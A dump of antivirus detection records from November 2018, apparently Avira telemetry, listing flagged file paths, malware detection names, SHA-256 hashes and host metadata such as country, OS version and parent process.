  Row(detection=Row(filename='avscan-20181101-210803-5a047803', filepath='\\\\?\\C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ccb5e6d0\\AVSCAN-20181101-210147-2591929C\\AVSCAN-20181101-210803-5A047803', filesize=3904000, name='HEUR/AGEN.1033264.#M1.#R1'), hash='b90be0161709682d885171d6589758b4ed7306ecafa6694505d9cb735096c217', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:22:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094448-02b4a4a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094448-02B4A4A3', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:44:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\xwkuwcnprxi\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/scan', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WiperSoft\\WiperSoft.exe', parentsize=4940400, timestamp='2018-11-01T18:32:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\g0emdijnoy0\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:15:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='turismo.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\TURISMO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='download_expert.exe', filepath='C:\\Download Expert\\Download_Expert.exe', filesize=4672000, name='HEUR/AGEN.1004471.#M1.#R1'), hash='adc00c66f046ca6468bb67c32aab78f57a41022497d62bde37fc34a8102deaa4', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T21:56:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nekton.exe', filepath='\\\\?\\C:\\Program Files\\ANSYS Inc\\ANSYS 19.1 FULL\\v191\\icemcfd\\win64_amd\\icemcfd\\output-interfaces\\nekton.exe', filesize=3136000, name='PUA/BitcoinMiner.#M1.#R1'), hash='8fbe78dbc18aa86b7046b1ec5f7f5435ad1dd177150283a92fe55dbd49393933', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:12:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182402-1f6399f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182402-1F6399F4', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kit tirocinio treviglio.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\KIT AZIENDALI\\kit tirocinio treviglio.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:18:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='stage 574309.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:22:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='z8j7cvbc5.exe', filepath='\\\\?\\C:\\Program Files\\Z8J7CVBC5R\\Z8J7CVBC5.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:57:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172311-cbb7610a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-172311-CBB7610A', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:23:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153537-c71d5cc4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-153537-C71D5CC4', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:35:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225339-02aa0905', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-201154-631B45A0\\AVSCAN-20181104-225339-02AA0905', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:53:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160717-eba487f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a591b5\\AVSCAN-20181104-155558-81439129\\AVSCAN-20181104-160717-EBA487F9', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:07:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bos_manage.exe', filepath='\\\\?\\C:\\Program Files\\BOSaNOVA Harel\\Bos_Manage.exe', filesize=344000, name='HEUR/APC.#M1.#R1'), hash='4672024f21ff8fc4ab5de1467761e7b0cfd4ae1fb2512bc7ea979843dcd9a133', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:03:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jewelquest.exe', filepath='\\\\?\\D:\\DATA\\Documents\\Jewel Quest\\JewelQuest.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='aa3208c2b9c8e9553af33ec596860c6c6e6852220f65d218c5f0143ad304ed5b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:54:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132329-4eb8d6a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132329-4EB8D6A5', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:23:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151302-488d93d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_38741662\\AVSCAN-20181104-151119-3B818559\\AVSCAN-20181104-151302-488D93D5', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:08:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T01:34:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='firefox[1].exe', filepath='C:\\Windows.old\\Documents and Settings\\Administrator\\Local Settings\\Temporary Internet Files\\Content.IE5\\GQKM80OQ\\Firefox[1].exe', filesize=1000000, name='PUA/Outbrowse.Gen.#M300.#R5615'), hash='11392c5ff4249c866c6c5174bed57a3f29bb81ef1e593dadbdaac54fd138eaa2', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Spybot - Search & Destroy 2\\SDRootAlyzer.exe', parentsize=5181720, timestamp='2018-11-04T00:31:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msqry32.exe', filepath='C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSQRY32.EXE', filesize=732000, name='W32/Sality.#M1.#R1'), hash='7f52a8e010c576023e63a142ec0259e97e6ee0daa9cdf1e9af316496b8f63e7c', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Avira\\SoftwareUpdater\\Avira.SoftwareUpdater.ServiceHost.exe', parentsize=102816, timestamp='2018-11-04T18:49:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124123-ccbb007b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a3c66a4\\AVSCAN-20181104-124102-C9CDE2DF\\AVSCAN-20181104-124123-CCBB007B', filesize=28000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='791f8f05505d197b2913104c716adfa3a4faa46591e05845ef3e535b415a405d', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:41:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='a96290b02ca8f9ec46bf2021980c1cdb156290d0d603123a65cf58b56323af56', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:08:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132733-611ca7a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132733-611CA7A7', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:27:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2160000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='32ac8c62e4c957eaf652dc7ba3da5d5a8ff86c83058926ef42efdf58bc38ff3d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T21:24:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204252-03b0cb99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0797a56a\\AVSCAN-20181104-200511-6EA15BC7\\AVSCAN-20181104-204252-03B0CB99', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T00:45:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131335-21e06bc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131335-21E06BC0', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:13:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190721-839f61d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_75ec5165\\AVSCAN-20181104-190221-6B3E262F\\AVSCAN-20181104-190721-839F61D9', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='14779879cd3b693ce92847a9439f380781b3b3a9cf764daa2e38d35db633dbc6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:07:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185720-88124c99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1da9bed9\\AVSCAN-20181104-185702-84EC4263\\AVSCAN-20181104-185720-88124C99', filesize=9344000, name='TR/Black.Gen2.#M1.#R1'), hash='9cd534d450db8b6b053240cd6d16cb3e3daefd32527d50b8f6ec0866934397c6', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:57:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T03:21:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:27:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134044-620a8c4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4ba32583\\AVSCAN-20181104-123253-424E92FB\\AVSCAN-20181104-134044-620A8C4F', filesize=128000, name='PUA/Outbrowse.Gen.#M1.#R1'), hash='0d5a3df5448512e7ab2096c0235b347ae9733c3c29b06d8860ca4d61c3623cf3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:14:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174204-e7998059', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c127e6c4\\AVSCAN-20181104-174134-E12ACD6C\\AVSCAN-20181104-174204-E7998059', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9bb403827bdf8c1112a659c220caaa0bef77a0c960175bdae55d23ca93973d52', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:42:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8baf', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8baf', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:31:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151320-ed02d957', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e729151\\AVSCAN-20181104-151115-DAE9550A\\AVSCAN-20181104-151320-ED02D957', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:13:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d47b', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d47b', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rad41899.tmp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Low\\rad41899.tmp.exe', filesize=192000, name='TR/Crypt.ZPACK.71063b.#M1.#R1'), hash='71063b91d8872098c2d6942af8d9e0d0d1346da19cb73a09110edac7295db7c1', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\cmd.exe', parentsize=302592, timestamp='2018-11-04T17:14:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:23:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000045', filepath='C:\\Windows\\Temp\\tmp0000059c\\tmp00000045', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='86de3d5dc1678919598aab07ecffaaeaf0e05b1b907a73d8b2d933d7fccd3095', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emsisoft Anti-Malware\\a2service.exe', parentsize=9449800, timestamp='2018-11-04T14:44:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T15:25:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:08:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:33:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='toolregistrysearch.exe', filepath='C:\\Program Files (x86)\\WinUtilities\\ToolRegistrySearch.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='8489184fb747ef927b1e1f587a634b75a3d3c4e51cce1db6dc16897205bec744', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\WiseRegistryCleaner\\Activator WiseCare.exe', parentsize=684032, timestamp='2018-11-04T14:46:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140530-d05003a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-140530-D05003A3', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='701926fd93e9c2d0aab4db525a57077a873abcbe63511ed7990078de635703fb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:35:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered notel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered notel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='66bf5e284a4da1edd06c0642be2278a0cafe63675b99bd29a587703cb431e6d7', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:42:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (2).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline='\\\\\\/FromInstall', country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Auslogics\\Anti-Malware\\AntiMalware.exe', parentsize=1906248, timestamp='2018-11-04T18:58:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skypebrowserhost.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Skype\\Browser\\SkypeBrowserHost.exe', filesize=316000, name='W32/Jeefo.A.#M1.#R1'), hash='62ac20fca24ae12db5bd321d163f504a439d97e12b8ab3112e3a9f66c2c68e26', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:14:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dup2patcher.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\dup2patcher.dll', filesize=384000, name='SPR/Hacktool.002b10.#M1.#R1'), hash='002b106a99023edc62a5bd957b6276646a15a36c45cf1aa798f74aceb4f9c504', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\fab\\Patch\\Patch.exe', parentsize=390656, timestamp='2018-11-04T08:37:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-095659-0907d26f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5e356039\\AVSCAN-20181104-095639-074A7496\\AVSCAN-20181104-095659-0907D26F', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:56:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kms10.exe', filepath='\\\\?\\C:\\Windows\\KMS10\\KMS10.exe', filesize=2176000, name='SPR/HackKMS.d5c565.#M1.#R1'), hash='d5c56597bf7381a46cd51bc26ff6a004945bc08a2760197ae45b98d904d14268', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:58:25Z'), dt=datetime.date(2018, 11, 4)),
